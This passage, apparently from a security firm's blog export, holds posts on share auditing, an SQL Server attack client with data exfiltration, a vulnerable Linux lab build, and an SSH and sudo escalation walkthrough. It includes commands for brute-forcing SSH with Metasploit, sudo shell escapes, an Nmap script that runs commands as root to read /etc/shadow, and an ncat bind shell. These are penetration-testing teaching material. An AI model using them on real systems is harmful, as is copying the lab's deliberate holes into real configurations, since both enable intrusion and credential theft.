Remember, share audits should be done on a regular cadence so you can identify and remediate high-risk share permissions before they become a threat. It is part of good IT and offensive security hygiene, just like penetration testing, adversary simulation, and red team operations.

For more on this topic, watch NetSPI’s webinar, How to Evaluate Active Directory SMB Shares at Scale.

Good luck and happy hunting!

[post_title] => Attacking and Remediating Excessive Network Share Permissions in Active Directory Environments [post_excerpt] => Learn how to quickly inventory, attack, and remediate network shares configured with excessive permissions assigned to SMB shares in Active Directory environments. [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => network-share-permissions-powerhuntshares [to_ping] => [pinged] => [post_modified] => 2023-01-23 15:10:24 [post_modified_gmt] => 2023-01-23 21:10:24 [post_content_filtered] => [post_parent] => 0 [guid] => https://www.netspi.com/?p=28175 [menu_order] => 108 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [13] => WP_Post Object ( [ID] => 28131 [post_author] => 53 [post_date] => 2022-08-04 10:26:57 [post_date_gmt] => 2022-08-04 15:26:57 [post_content] =>
Watch Now

Vulnerability management programs often fail to identify excessive network share permissions, which can be a major security issue. Excessive share permissions have become a risk for data exposure, ransomware attacks, and privilege escalation within enterprise environments.

In this discussion, NetSPI's Vice President of Research Scott Sutherland will talk about why these security issues exist. He will explain how to identify and manage excessive access to common network shares within Active Directory environments.

Join the conversation to see Scott’s latest open source project PowerHuntShares in action and to learn:

  • Common reasons why share permissions are configured with excessive privileges 
  • How to quickly inventory excessive share permissions across an entire Active Directory domain
  • How to efficiently triage those results to help reduce risk for your organization

[wonderplugin_video iframe="https://youtu.be/TtwyQchCz6E" lightbox=0 lightboxsize=1 lightboxwidth=1200 lightboxheight=674.999999999999916 autoopen=0 autoopendelay=0 autoclose=0 lightboxtitle="" lightboxgroup="" lightboxshownavigation=0 showimage="" lightboxoptions="" videowidth=1200 videoheight=674.999999999999916 keepaspectratio=1 autoplay=0 loop=0 videocss="position:relative;display:block;background-color:#000;overflow:hidden;max-width:100%;margin:0 auto;" playbutton="https://www.netspi.com/wp-content/plugins/wonderplugin-video-embed/engine/playvideo-64-64-0.png"]

[post_title] => How to evaluate Active Directory SMB shares at scale [post_excerpt] => [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => evaluating-active-directory-smb-shares-at-scale [to_ping] => [pinged] => [post_modified] => 2022-11-11 12:03:52 [post_modified_gmt] => 2022-11-11 18:03:52 [post_content_filtered] => [post_parent] => 0 [guid] => https://www.netspi.com/?post_type=webinars&p=28131 [menu_order] => 9 [post_type] => webinars [post_mime_type] => [comment_count] => 0 [filter] => raw ) [14] => WP_Post Object ( [ID] => 28035 [post_author] => 17 [post_date] => 2022-07-01 12:19:00 [post_date_gmt] => 2022-07-01 17:19:00 [post_content] =>

On July 1, 2022, NetSPI Senior Director Scott Sutherland was featured on Help Net Security where he discusses how, in order to stay ahead of malicious actors, organizations must shift their gaze to detect attackers before something bad happens. Read the summary below or watch the video online.

+++

  • Many vendors promote 100% coverage, but most EDR and MSSP vendors only provide 20% of that coverage.
  • Companies that partner with MSSP vendors must view their contracts carefully to understand what malicious activities vendors cover.
  • Companies are overdependent on Indicators of Compromise (IOCs) – provided and available in the community – but these tools should be part of a larger program, not the end of the program.
  • Detection starts with a framework like the popular MITRE ATT&CK framework.
  • Two challenges of building behavior-based threat detection: mapping technique coverage holistically and choosing which procedures to cover.
  • Review annual reports from threat detection companies to get a picture of the most common techniques and leverage your threat detection resources.
[post_title] => Help Net Security: The Challenges and Advantages of Building Behavior-based Threat Detection [post_excerpt] => NetSPI Senior Director Scott Sutherland was featured on Help Net Security where he discusses how, in order to stay ahead of malicious actors, organizations must shift their gaze to detect attackers before something bad happens. [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => help-net-security-building-behavior-based-threat-detection [to_ping] => [pinged] => [post_modified] => 2023-01-23 15:10:29 [post_modified_gmt] => 2023-01-23 21:10:29 [post_content_filtered] => [post_parent] => 0 [guid] => https://www.netspi.com/?p=28035 [menu_order] => 119 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [15] => WP_Post Object ( [ID] => 25884 [post_author] => 53 [post_date] => 2021-07-12 15:36:48 [post_date_gmt] => 2021-07-12 20:36:48 [post_content] =>

Ransomware is a strategy for adversaries to make money – a strategy that’s proven successful. In this webinar, NetSPI’s Scott Sutherland and Alexander Polce Leary will cover how ransomware works, ransomware trends to watch, best practices for prevention, and more. At the core of the discussion, Scott and Alexander will explain how to build detections for common tactics, techniques, and procedures (TTPs) used by ransomware families and how to validate they work, ongoing, as part of the larger security program. Participants will leave this webinar with actionable advice to ensure their organization is more resilient to ever-evolving ransomware attacks.

[post_title] => How to Build and Validate Ransomware Attack Detections [post_excerpt] => [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => build-validate-ransomware-attack-detections [to_ping] => [pinged] => [post_modified] => 2022-11-11 12:14:33 [post_modified_gmt] => 2022-11-11 18:14:33 [post_content_filtered] => [post_parent] => 0 [guid] => https://www.netspi.com/?post_type=webinars&p=25884 [menu_order] => 28 [post_type] => webinars [post_mime_type] => [comment_count] => 0 [filter] => raw ) [16] => WP_Post Object ( [ID] => 19547 [post_author] => 53 [post_date] => 2020-08-04 11:37:01 [post_date_gmt] => 2020-08-04 16:37:01 [post_content] =>

Mainframes run the global economy and are at the heart of many of the world’s largest financial institutions. During this webinar, we will be interviewing our Mainframe security partner Chad Rikansrud from BMC. Chad will be discussing what mainframes are, how they can be a risk, and what companies can do to identify security holes before the bad guys do.

https://youtu.be/K0JNYXU-86w
[post_title] => Why zOS Mainframe Security Matters [post_excerpt] => Mainframes run the global economy and are at the heart of the many of the world’s largest financial organizations. [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => why-zos-mainframe-security-matters [to_ping] => [pinged] => [post_modified] => 2022-11-11 12:14:54 [post_modified_gmt] => 2022-11-11 18:14:54 [post_content_filtered] => [post_parent] => 0 [guid] => https://www.netspi.com/?post_type=webinars&p=19547 [menu_order] => 56 [post_type] => webinars [post_mime_type] => [comment_count] => 0 [filter] => raw ) [17] => WP_Post Object ( [ID] => 19230 [post_author] => 53 [post_date] => 2020-06-02 13:49:41 [post_date_gmt] => 2020-06-02 13:49:41 [post_content] => Your employees were probably working from home more and more anyway, but the COVID-19 situation has taken work from home to a whole new level for many companies. Have you really considered all the security implications of moving to a remote workforce model? Chances are you and others are more focused on just making sure people can work effectively and are less focused on security. But at times of crisis – hackers are known to increase their efforts to take advantage of any weak links they can find in an organization’s infrastructure. Host-based security represents a large surface of attack that continues to grow as employees become increasingly mobile and work from home more often. Join our webinar to make sure your vulnerability management program is covering the right bases to help mitigate some of the implicit risks associated with a remote workforce. [post_title] => Host-Based Security: Staying Secure While Your Employees Work from Home [post_excerpt] => Watch this on-demand webinar to make sure you are vulnerability management program is covering the right bases to help mitigate some of the implicit risks associated with a remote workforce. [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => host-based-security-staying-secure-while-your-employees-work-from-home-2 [to_ping] => [pinged] => [post_modified] => 2022-11-11 12:15:10 [post_modified_gmt] => 2022-11-11 18:15:10 [post_content_filtered] => [post_parent] => 0 [guid] => https://www.netspi.com/?post_type=webinars&p=19230 [menu_order] => 59 [post_type] => webinars [post_mime_type] => [comment_count] => 0 [filter] => raw ) [18] => WP_Post Object ( [ID] => 19772 [post_author] => 53 [post_date] => 2020-05-20 10:46:24 [post_date_gmt] => 2020-05-20 10:46:24 [post_content] =>

Watch the second webinar in our Lunch & Learn Series below!

Where there is Active Directory, there are SQL Servers. In dynamic enterprise environments, it’s common to see both platforms suffer from misconfigurations that lead to unauthorized system and sensitive data access. During this presentation, Scott covers common ways to target, exploit, and escalate domain privileges through SQL Servers in Active Directory environments. He also shares a msbuild.exe project file that can be used as an offensive SQL Client during red team engagements when tools like PowerUpSQL are too overt.

This presentation was originally developed for the Troopers20 conference, but due to the current travel constraints we’ll be sharing it online during this webinar.

https://youtu.be/Y0kD-xCZ3aI
[post_title] => SQL Server Hacking Tips for Active Directory Environments Webinar [post_excerpt] => During this presentation, NetSPI's Scott Sutherland covers common ways to target, exploit, and escalate domain privileges through SQL Servers in Active Directory environments. [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => sql-server-hacking-tips-for-active-directory-environments-webinar [to_ping] => [pinged] => [post_modified] => 2022-11-11 12:15:34 [post_modified_gmt] => 2022-11-11 18:15:34 [post_content_filtered] => [post_parent] => 0 [guid] => https://www.netspi.com/?post_type=webinars&p=19772 [menu_order] => 63 [post_type] => webinars [post_mime_type] => [comment_count] => 0 [filter] => raw ) [19] => WP_Post Object ( [ID] => 11555 [post_author] => 17 [post_date] => 2020-05-04 07:00:04 [post_date_gmt] => 2020-05-04 07:00:04 [post_content] =>
Esc Logo

Evil SQL Client (ESC) is an interactive .NET SQL console client that supports enhanced SQL Server discovery, access, and data exfiltration capabilities. While ESC can be a handy SQL Client for daily tasks, it was originally designed for targeting SQL Servers during penetration tests and red team engagements. The intent of the project is to provide an .exe, but also sample files for execution through mediums like msbuild and PowerShell.

This blog will provide a quick overview of the tool. For those who just want the code, it can be downloaded from https://github.com/NetSPI/ESC.

Why another SQL Server attack client?

PowerUpSQL and DAFT (a fantastic .NET port of PowerUpSQL written by Alexander Leary) are great tool sets, but during red team engagements they can be a little too visible. So, to stay under the radar, we initially created a series of standalone .NET functions that could be executed via alternative mediums like MSBuild inline tasks. Following that, a few clients asked us to exfiltrate data from their SQL Servers using similar evasion techniques. So we created the Evil SQL Client console to help make the testing process faster and the report screenshots easier to understand :) .

Summary of Executions Options

The Evil SQL Client console and functions can be run via:

  • Esc.exe is the original application created in Visual Studio.
  • Esc.csproj is an MSBuild script that loads .NET code directly through inline tasks. This technique was researched and popularized by Casey Smith (@subTee). There is a nice article on detection worth reading by Steve Cooper (@BleepSec) here.
  • Esc.xml is also an MSBuild script that uses inline tasks, but it loads the actual esc.exe assembly through reflection. This technique was shared by @bohops in his GhostBuild project. It also leverages work done by @mattifestation.
  • Esc-example.ps1 is a PowerShell script that loads esc.exe through reflection. This specific script was generated using Out-CompressDll by @mattifestation.
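In practice, launching each medium looks something like the following minimal sketch; the MSBuild path is the common .NET Framework 4 location, and the file names assume you are in the project directory.

# 1. Run the compiled binary directly
.\esc.exe

# 2. Execute the inline-task project through MSBuild
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe .\esc.csproj

# 3. Load the assembly through PowerShell reflection by dot-sourcing the sample script
. .\esc-example.ps1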

Below is a simple screenshot of the Evil SQL Client console executed via esc.exe:

Start Esc Compile

Below is a simple screenshot of the Evil SQL Client console being executed through MSBuild:

Esc Msbuild

Summary of Features/Commands

At the moment, ESC does not have full feature parity with PowerUpSQL or DAFT, but the most useful bits are there. Below is a summary of the features that do exist.

Discovery             Access            Gather                  Escalate           Exfil
Discover file         Check access      Single instance query   Check loginaspw    Set File
Discover domainspn    Check defaultpw   Multi instance query    Check uncinject    Set FilePath
Discover broadcast    Show access       List serverinfo         Run oscmd          Set icmp
Show discovered       Export access     List databases                             Set icmpip
Export discovered                       List tables                                Set http
                                        List links                                 Set httpurl
                                        List logins
                                        List rolemembers
                                        List privy

*All query results are exfiltrated via all enabled methods.

For more information on available commands visit: https://github.com/NetSPI/ESC/blob/master/README.md#supportedcommands

Wrap Up

Hopefully, the Evil SQL Client console will prove useful on engagements and help illustrate the need for a larger time investment in detective control development surrounding MSBuild inline task execution, SQL Server attacks, and basic data exfiltration. For more information regarding the Evil SQL Client (ESC), please visit the GitHub project.

Below are some additional links to get you started on building detections for common malicious MSBuild and SQL Server use:

Good luck and hack responsibly!

[post_title] => Evil SQL Client Console: Msbuild All the Things [post_excerpt] => Evil SQL Client (ESC) is an interactive .net SQL console client that supports enhanced SQL Server discovery, access, and data exfiltration capabilities. [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => evil-sql-client-console-msbuild-all-the-things [to_ping] => [pinged] => [post_modified] => 2021-06-08 22:00:18 [post_modified_gmt] => 2021-06-08 22:00:18 [post_content_filtered] => [post_parent] => 0 [guid] => https://blog.netspi.com/?p=11555 [menu_order] => 384 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [20] => WP_Post Object ( [ID] => 18158 [post_author] => 53 [post_date] => 2020-04-07 10:18:04 [post_date_gmt] => 2020-04-07 15:18:04 [post_content] =>

During this webinar we’ll review how to create, import, export, and modify CLR assemblies in SQL Server with the goal of privilege escalation, OS command execution, and persistence. Scott will also share a few PowerUpSQL functions that can be used to execute the CLR attacks on a larger scale in Active Directory environments.

https://youtu.be/A_hZHwisRxc
[post_title] => Attacking SQL Server CLR Assemblies [post_excerpt] => Watch this on-demand webinar on Attacking SQL Server CLR Assemblies with NetSPI’s Scott Sutherland. [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => attacking-sql-server-clr-assemblies [to_ping] => [pinged] => [post_modified] => 2022-11-11 12:16:09 [post_modified_gmt] => 2022-11-11 18:16:09 [post_content_filtered] => [post_parent] => 0 [guid] => https://www.netspi.com/?post_type=webinars&p=18158 [menu_order] => 66 [post_type] => webinars [post_mime_type] => [comment_count] => 0 [filter] => raw ) [21] => WP_Post Object ( [ID] => 11391 [post_author] => 17 [post_date] => 2020-03-27 07:00:57 [post_date_gmt] => 2020-03-27 07:00:57 [post_content] => This blog will share how to configure your own Linux server with the vulnerabilities shown in the "Linux Hacking Case Studies" blog series. That way you can practice building and breaking at home. Similar to the rest of the series, this blog is really intended for people who are new to penetration testing, but hopefully there is a little something for everyone. Enjoy! Below are links to the first four blogs in the series: Below is an overview of what will be covered in this blog:

Lab Scenarios

This section briefly summarizes the lab scenarios that you'll be building which are based on this blog series.
# | REMOTE VULNERABILITY | LOCAL VULNERABILITY | ESCALATION PATH
1 | Excessive privileges configured on a Rsync server | Excessive privileges configured on the Rsync server. Specifically, the server is configured to run as root. | Create a new privileged user by adding lines to the shadow, passwd, group, and sudoers files.
2 | Excessive privileges configured on a NFS export | Insecure setuid binary that allows arbitrary code execution as root. | Review setuid binaries and determine which ones have the direct or indirect capability to execute arbitrary code as root.
3 | Weak password configured for phpMyAdmin | Excessive privileges configured on a script that is executed by a root cron job. Specifically, the script file is world writable. | Write a command to the world-writable script that starts a netcat listener. When the root cron job executes the script, the netcat listener will start as root. It's then possible to connect to the netcat listener remotely to obtain root access. Reverse shell alternatives here.
4 | Weak password configured for SSH | Insecure sudoers configuration that allows arbitrary code execution as root through sudo applications. | Review sudo applications to determine which ones have the direct or indirect capability to execute arbitrary code as root. Examples include sh, vi, python, netcat, and the use of a custom nmap module.

Kali VM and Install Dependencies

For this lab, we'll be building our vulnerable services on a standard Kali image. If you don't already have a Kali VM, you can download one from the Kali website to get set up. Once your Kali VM is ready to go, you'll want to install some packages that will be required for setting up the scenarios in the lab. Make sure to sign in as root; you'll need those privileges to set up the lab. Install Required Packages
apt-get update
apt-get install nfs-kernel-server
apt-get install nfs-common
apt-get install ufw
apt-get install nmap
Clear Firewall Restrictions
iptables --flush
ufw allow from any to any
ufw status
With that out of the way let's dive in.

Lab Setup: Rsync

Attack Lab: Linux Hacking Case Study Part 1: Rsync In this section we'll cover how to configure an insecure Rsync server. Once you're logged in as root, execute the commands below. Let's start by creating the rsyncd.conf configuration file:
echo "motd file = /etc/rsyncd.motd" > /etc/rsyncd.conf
echo "lock file = /var/run/rsync.lock" >> /etc/rsyncd.conf
echo "log file = /var/log/rsyncd.log" >> /etc/rsyncd.conf
echo "pid file = /var/run/rsyncd.pid" >> /etc/rsyncd.conf
echo " " >> /etc/rsyncd.conf
echo "[files]" >> /etc/rsyncd.conf
echo " path = /" >> /etc/rsyncd.conf
echo " comment = Remote file share." >> /etc/rsyncd.conf
echo " uid = 0" >> /etc/rsyncd.conf
echo " gid = 0" >> /etc/rsyncd.conf
echo " read only = no" >> /etc/rsyncd.conf
echo " list = yes" >> /etc/rsyncd.conf
Next, let's set up the rsync service:
systemctl enable rsync
systemctl start rsync
or
systemctl restart rsync
Verify the Configuration
rsync 127.0.0.1::
rsync 127.0.0.1::files

Lab Setup: NFS

Attack Lab: Linux Hacking Case Study Part 2: NFS In this section we cover how to configure insecure NFS exports and an insecure setuid binary.  Once you're logged in as root execute the commands below.

Configure NFS Exports

Create NFS Exports
echo "/home *(rw,sync,no_root_squash)" >> /etc/exports
echo "/ *(rw,sync,no_root_squash)" >> /etc/exports
Start NFS Server
systemctl start nfs-kernel-server.service
systemctl restart nfs-kernel-server
Verify NFS Export
showmount -e 127.0.0.1
Create Password Files for Discovery
echo "user2:test" > /root/user2.txt
echo "test:password" > /tmp/creds.txt
echo "test:test" > /tmp/mypassword.txt
Enable password authentication through SSH.
sed -i 's/PasswordAuthentication no/PasswordAuthentication yes/g' /etc/ssh/sshd_config
service ssh restart

Create Insecure Setuid Binary

Create the source code for a binary that can execute arbitrary OS commands called exec.c:
cat << 'EOF' > /home/test/exec.c
#include <stdlib.h>
#include <stdio.h>
#include <unistd.h>
#include <string.h>

int main(int argc, char *argv[]){

    printf("%s,%d\n", "USER ID:", getuid());
    printf("%s,%d\n", "EXEC ID:", geteuid());

    printf("Enter OS command:");
    char line[100];
    fgets(line, sizeof(line), stdin);
    line[strlen(line) - 1] = '\0';
    char *s = line;
    char *command[5];
    int i = 0;
    while(s){
        command[i] = strsep(&s, " ");
        i++;
    }
    command[i] = NULL;
    execvp(command[0], command);
}
EOF
Compile exec.c:
gcc -o /home/test/exec /home/test/exec.c
rm /home/test/exec.c
Configure setuid on exec so that we can execute commands as root:
chmod 4755 /home/test/exec
Verify you can execute the exec binary as a least privilege user.
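A minimal verification sketch, assuming the "test" user created earlier in this lab:

# Confirm the setuid bit is set (look for the "s" in the permissions, e.g. -rwsr-xr-x)
ls -l /home/test/exec
# Run the binary as a low-privilege user; the EXEC ID line should report 0 (root)
su - test -c /home/test/exec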

Lab Setup: phpMyAdmin

Attack Lab: Linux Hacking Case Study Part 3: phpMyAdmin In this section we'll cover how to configure an insecure instance of phpMyAdmin, a root cron job, and a script that's world writable.  Once you're logged in as root execute the commands below.

Reset the root Password (this is mostly for existing MySQL instances)

We'll start by resetting the root password on the local MySQL instance.  MySQL should be installed by default in Kali, but if it's not on your build you'll have to install it first.
# Stop mysql
/etc/init.d/mysql stop

# Start MySQL in safe mode and log in as root
mysqld_safe --skip-grant-tables&
mysql -uroot

# Select the database to use
use mysql;

# Reset the root password
update user set password=PASSWORD("password") where User='root';
flush privileges;
quit

# Restart the server
/etc/init.d/mysql stop
/etc/init.d/mysql start

# Confirm update by logging in with new password
mysql -u root -p
exit

Install PHPMyAdmin

Alrighty, time to install phpMyAdmin.
apt-get install phpmyadmin
Eventually you will be presented with a GUI. Follow the instructions below.
  1. Choose apache2 for the web server. Warning: When the first prompt appears, apache2 is highlighted, but not selected. If you do not hit Space to select Apache, the installer will not move the necessary files during installation. Hit Space, Tab, and then Enter to select Apache.
  2. Select yes when asked whether to use dbconfig-common to set up the database.
  3. You will be prompted for your database administrator's password, which should be set to "password" to match the lab.
After the installation we still have a few things to do. Let's create a soft link in the webroot to phpmyadmin.
ln -s /usr/share/phpmyadmin/ /var/www/phpmyadmin
Then, let's restart the required services:
service apache2 restart
service mysql restart
Next, let's add the admin user we'll be guessing later.
mysql -u root
use mysql;
CREATE USER 'admin'@'%' IDENTIFIED BY 'password';
GRANT ALL PRIVILEGES ON *.* TO 'admin'@'%' WITH GRANT OPTION;
exit
Finally, configure excessive privileges in the webroot just for fun:
cd /var/www/
chown -R www-data *
chmod -R 777 *
When it's all done you should be able to verify the setup by logging into https://127.0.0.1/phpmyadmin as the "admin" user with a password of "password".

Create a World Writable Script

Next up, let's make a world writable script that will be executed by a cron job.
mkdir /scripts
echo "echo hello world" >> /scripts/rootcron.sh
chmod -R 777 /scripts
Create Root Cron Job Now, let's configure a root cron job to execute the script every minute.
echo "* * * * * /scripts/rootcron.sh" > mycron
crontab mycron
You can then verify the cron job was added with the command below.
crontab -l

Lab Setup: Sudoers

Attack Lab: Linux Hacking Case Study Part 4: Sudoers Horror Stories This section outlines how to create a sudoers configuration that allows the execution of applications that can run arbitrary commands. Create Encrypted Password The command below will allow you to create an encrypted password for generating test users. I originally found this guidance from https://askubuntu.com/questions/94060/run-adduser-non-interactively.
openssl passwd -crypt test
Next, you can add new users using the generated password hash below. This is not required, but it's handy for scripting out environments.
useradd -m -p O1Fug755UcscQ -s /bin/bash test
useradd -m -p O1Fug755UcscQ -s /bin/bash user1
useradd -m -p O1Fug755UcscQ -s /bin/bash user2
useradd -m -p O1Fug755UcscQ -s /bin/bash user3
useradd -m -p O1Fug755UcscQ -s /bin/bash tempuser
Create an Insecure Sudoers Configuration The sudoers configuration below will allow vi, nmap, python, and sh to be executed as root by test and user1.
echo "Cmnd_Alias ALLOWED_CMDS = /usr/bin/vi, /usr/bin/nmap, /usr/bin/python3.6, /usr/bin/python3.7, /usr/bin/sh" > /etc/sudoers
echo "test ALL=(ALL) NOPASSWD: ALLOWED_CMDS" >> /etc/sudoers
echo "user1 ALL=(ALL) NOPASSWD: ALLOWED_CMDS" >> /etc/sudoers
When it's all done you can log in as the previously created test user to verify the sudo applications are available, as shown in the sketch below:
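A quick check, assuming the "test" user created above:

# Log in as the test user and list the allowed sudo commands
su - test
sudo -l
# Any of the allowed applications can then be used to get a root shell, e.g.:
sudo sh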

Wrap Up

In this blog we covered how to configure your own vulnerable Linux server, so you can learn in a safe environment. Hopefully the Linux Hacking Case Studies blog series was useful for those of you who are new to the security community. Stay safe and hack responsibly! [post_title] => Linux Hacking Case Studies Part 5: Building a Vulnerable Linux Server [post_excerpt] => This blog will share how to configure your own vulnerable Linux server so you can practice building and breaking at home. [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => linux-hacking-case-studies-part-5-building-a-vulnerable-linux-server [to_ping] => [pinged] => [post_modified] => 2021-06-08 21:59:23 [post_modified_gmt] => 2021-06-08 21:59:23 [post_content_filtered] => [post_parent] => 0 [guid] => https://blog.netspi.com/?p=11391 [menu_order] => 397 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [22] => WP_Post Object ( [ID] => 11375 [post_author] => 17 [post_date] => 2020-03-26 07:00:57 [post_date_gmt] => 2020-03-26 07:00:57 [post_content] =>

This blog will cover different ways to approach SSH password guessing and attacking sudo applications to gain a root shell on a Linux system. This case study commonly makes appearances in CTFs, but the general approach for attacking weak passwords and sudo applications can be applied to many real world environments. This should be a fun walk through for people new to penetration testing.

This is the fourth of a five part blog series highlighting entry points and local privilege escalation paths commonly found on Linux systems during network penetration tests.

Below are links to the first three blogs in the series:

Below is an overview of what will be covered in this blog:

Finding SSH Servers

Before we can start password guessing or attacking sudo applications, we need to find some SSH servers to go after.  Luckily Nmap and similar port scanning tools make that pretty easy because most vendors still run SSH on the default port of 22.

Below is a sample Nmap command and screenshot to get you started.

nmap -sS -sV -p22 192.168.1.0/24 -oA sshscan

Once you’ve run the port scan you can quickly parse the results to make a file containing a list of SSH servers to target. Below is a command example and quick video to help illustrate.

grep -i "open" sshscan.gnmap
grep -i "open" sshscan.gnmap | awk -F ' ' '{print $2}' > ssh.txt
cat ssh.txt

Dictionary Attacks against SSH Servers

Password guessing is a pretty basic way to gain initial access to a Linux system, but that doesn't mean it's not effective. We see default and weak SSH passwords configured in at least half of the environments we look at.

If you haven't done it before, below are a few tips to get you started.

  1. Perform additional scanning and fingerprinting against the target SSH server and try to determine if it’s a specific device. For example, determine if it is a known printer, switch, router, or other miscellaneous network device. In many cases, knowing that little piece of information can lead you to default device passwords and land you on the box.
  2. Based on the service fingerprinting, also try to determine if any applications are running on the system that create local user accounts that might be configured with default passwords.
  3. Lastly, try common username and password combinations. Please be careful with this approach if you don’t understand the account lockout policies though.  No one wants to have a bad day. 😊

Password Lists

In this scenario let's assume we're going to test for common username and password combinations. That means we'll need a file containing a list of users and a file containing a list of passwords. Kali ships with some good word lists that provide coverage for common usernames and passwords. Many can be found in /usr/share/wordlists/.


While those can be handy, for this scenario we're going to create a few small custom lists.

Create users.txt File Containing:

echo user >> users.txt
echo root >> users.txt
echo test >> users.txt

Create passwords.txt File Containing:

echo Password >> passwords.txt
echo Password1 >> passwords.txt
echo toor >> passwords.txt
echo test >> passwords.txt

Password Guessing

Metasploit has modules that can be used to perform online dictionary attacks against most management protocols. Most of those modules use the protocol_login naming standard (example: ssh_login). Below is an example of the ssh_login module usage.

msfconsole
spool /root/ssh_login.log
use auxiliary/scanner/ssh/ssh_login
set USER_AS_PASS TRUE
set USER_FILE /root/users.txt
set PASS_FILE /root/passwords.txt
set rhosts file:///root/ssh.txt
set threads 100
set verbose TRUE
show options
run

Below is what it should look like if you successfully guess a password.


Here is a quick video example that shows the process of guessing passwords and gaining initial access with Metasploit.

Once you have identified a valid password you can also login using any ssh client.
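For example, here's a quick non-interactive login sketch using sshpass (available in the Kali repos; the host and credentials are the lab values used in this series):

# Log in with the guessed credential pair
sshpass -p 'Password1' ssh test@192.168.1.171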



Viewing Sudoers Execution Options

There are a lot of tools like Metasploit, LinEnum, Lynis, LinuxPrivCheck, UnixPrivsEsc, etc that can be used to help identify weak configurations that could be leveraged for privilege escalation, but we are going to focus on insecure sudoers configurations.

Sudoers is a configuration file in Linux that defines which commands can be run as which user. It's also commonly used to define commands that can be run as root by non-root users.

The sudo command below can be used to see what commands our user can run as root.

sudo -l

In this scenario, our user has the ability to run any command as root, but we’ll experiment with a few different command examples.

Exploiting Sudo sh

Unfortunately, we have seen this in a handful of real environments.  Allowing users to execute “sh” or any other shell through sudo provides full root access to the system.  Below is a basic example of dropping into a “sh” shell using sudo.

sudo sh


Exploiting Sudo VI

VI is a text editor that's installed by default in most Linux distros.  It’s popular with lots of developers. As a result, it’s semi-common to see developers provided with the ability to execute VI through sudo to facilitate the modification of privileged configurations files used in development environments.  Having the ability to modify any file on the system has its own risks, but VI actually has a built-in function that allows the execution of arbitrary commands.  That means, if you provided a user sudo access to VI, then you have effectively provided them with root access to your server.

Below is a command example:

sudo vi
ESC (press esc key)
:!whoami

Below are some example screenshots showing the process.


Exploiting Sudo Python

People also love Python.  It’s a scripting language used in every industry vertical and isn’t going away any time soon. It’s actually pretty rare to see Python or other programming engines broadly allowed to execute through sudo, but we have seen it a few times so I thought I’d share an example here.  Python, like most robust scripting and programming languages, supports arbitrary command execution capabilities by default.

Below is a basic command example and a quick video for the sake of illustration:

sudo python -c "import os; os.system('whoami')"
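Note that if only the python3.x binaries are whitelisted in sudoers (as in the lab setup from Part 5 of this series), the python3 form may be what's needed:

sudo python3 -c "import os; os.system('whoami')"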

Here are a few quick video examples.

Exploiting Sudo Nmap

Most privilege escalation involves manipulating an application running as a higher privilege into running your code or commands.  One of the many techniques used by attackers is to simply leverage the native functionality of the target application. One common theme we see across many applications is the ability to create and load custom modules, plug-ins, or add-ons.

For the sake of this scenario, let's assume we can run Nmap using sudo and now we want to use its functionality to execute operating system commands.

When I see that an application like Nmap can be run through sudo, I typically follow a process similar to the one below:

  1. Does Nmap allow me to directly execute os commands?
    No (only in old versions using the --interactive flag and !whoami)
  2. Does Nmap allow me to extend its functionality?
    Yes, it allows users to load and execute custom .nse modules.
  3. What programming language are the .nse modules written in?
    Nmap .nse modules use the LUA scripting engine.
  4. Does the LUA scripting engine support OS command execution?
    Yep. So let’s build a LUA module to execute operating system commands. It’s important to note that we could potentially write a module to execute shell code or call specific APIs, but in this example we'll keep it simple.

Let's assume at this point you spent a little time reviewing existing Nmap modules/LUA capabilities and developed the following .nse module.

--- SAMPLE SCRIPT
local nmap = require "nmap"
local shortport = require "shortport"
local stdnse = require "stdnse"
local command  = stdnse.get_script_args(SCRIPT_NAME .. ".command") or nil
print("Command Output:")
local t = os.execute(command)
description = [[This is a basic script for executing os commands through a Nmap nse module (lua script).]]
---
-- @usage
-- nmap --script=./exec.nse --script-args='command=whoami'
-- @output
-- Output:
-- root
-- @args command
author = "Scott Sutherland"
license = "Same as Nmap--See https://nmap.org/book/man-legal.html"
categories = {"vuln", "discovery", "safe"}
portrule = shortport.http
action = function(host,port)   
end

Once the module is copied to the target system, you can then run your custom module through Nmap. Below you can see the module successfully runs as our unprivileged user.

nmap --script=./exec.nse --script-args='command=whoami'
sudo nmap --script=./exec.nse --script-args='command=cat /etc/shadow'

Now, you can see we're able to run arbitrary commands in the root user's context, when running our new Nmap module through sudo.

So that’s the Nmap example. Also, for the fun of it, we occasionally configure ncat in sudoers when hosting CTFs, but to be honest I've never seen that in the real world. Either way, the video below shows both the Nmap and ncat scenarios.
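For reference, a minimal sketch of that ncat scenario, assuming /usr/bin/ncat were allowed in sudoers:

# Start a root bind shell using the allowed ncat binary
sudo ncat -l 12345 -e /bin/sh
# Then connect from another host
ncat 192.168.1.171 12345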

Wrap Up

In this blog we talked about different ways to approach SSH password guessing and attacking sudo applications. I hope it was useful information for those new to the security community. Good luck and hack responsibly!

[post_title] => Linux Hacking Case Studies Part 4: Sudo Horror Stories [post_excerpt] => This blog will cover different ways to approach SSH password guessing and attacking sudo applications to gain a root shell on a Linux system. [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => linux-hacking-case-studies-part-4-sudo-horror-stories [to_ping] => [pinged] => [post_modified] => 2022-04-04 10:01:32 [post_modified_gmt] => 2022-04-04 15:01:32 [post_content_filtered] => [post_parent] => 0 [guid] => https://blog.netspi.com/?p=11375 [menu_order] => 398 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [23] => WP_Post Object ( [ID] => 11333 [post_author] => 17 [post_date] => 2020-03-25 07:00:52 [post_date_gmt] => 2020-03-25 07:00:52 [post_content] =>

